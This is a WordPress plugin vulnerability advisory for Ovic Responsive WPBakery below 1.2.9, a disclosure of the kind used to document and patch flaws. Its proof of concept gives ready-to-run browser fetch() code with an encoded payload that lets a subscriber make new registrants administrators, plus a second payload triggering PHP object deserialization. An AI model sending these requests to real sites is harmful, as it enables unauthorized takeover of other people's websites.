WordPress Plugin Vulnerabilities
Ovic Responsive WPBakery < 1.2.9 - Subscriber+ Option Update
Description
The plugin does not limit which options can be updated via some of its AJAX actions, which may allow attackers with a subscriber+ account to update blog options, such as 'users_can_register' and 'default_role'. It also unserializes user input in the process, which may lead to Object Injection attacks.
Proof of Concept
1) Log onto the site as a subscriber 2) Run the following in your browser's console: ``` fetch('/wp-admin/admin-ajax.php', { method: 'POST', credentials: "include", mode: 'cors', headers: { "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", }, body: 'action=ovic_vc_import_options&data=eNoljEEKgCAQXDC_EvsD6xLrtVwndJctNxFMYdcOEf09pevMMIQTPopmRriURd1O2QmHqJUFbERjmx0RPB90peqkJIbOJgTyZ8ytFKpFOmyXLZWQ6fwbg7ByO_lhu4cF7PsBLlEk4w' }) .then(response => response.text()) .then(data => { console.log(data); }) ``` 3) Log out, and visit /wp-login.php to create a new account, which will automatically be given the `administrator` role. --- After version 1.2.8, the following POC demonstrates a remaining Admin+ Object Deserialization vulnerability: 1) Ensure that the WP Bakery plugin is installed and activated. 2) Put the following code on the server in order to simulate a malicious gadget chain: class Evil { public function __wakeup() : void { error_log( "[*] Evil object unserialize! BOOM!" ); die( "[*] Evil object unserialize! BOOM!"); } } 3) Visit the /wp-admin/admin.php?page=ovic-vc-addon page as an admin user. 4) Run the following code in the browser to see the deserialization occur: fetch(ovic_vc_params.ajaxurl, { method: 'POST', credentials: "include", mode: 'cors', headers: { "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", }, body: 'action=ovic_vc_import_options&data=eNrztzKxUnIty8xRsjKwqq4FXDAgkQRo' }) .then(response => response.text()) .then(data => { console.log(data); })
Affects Plugins
References
CVE
Classification
Type
PRIVESC
OWASP top 10
CWE
Miscellaneous
Original Researcher
Gibran Abdillah
Submitter
Gibran Abdillah
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-11-07 (about 6 months ago)
Added
2023-12-13 (about 5 months ago)
Last Updated
2023-12-18 (about 4 months ago)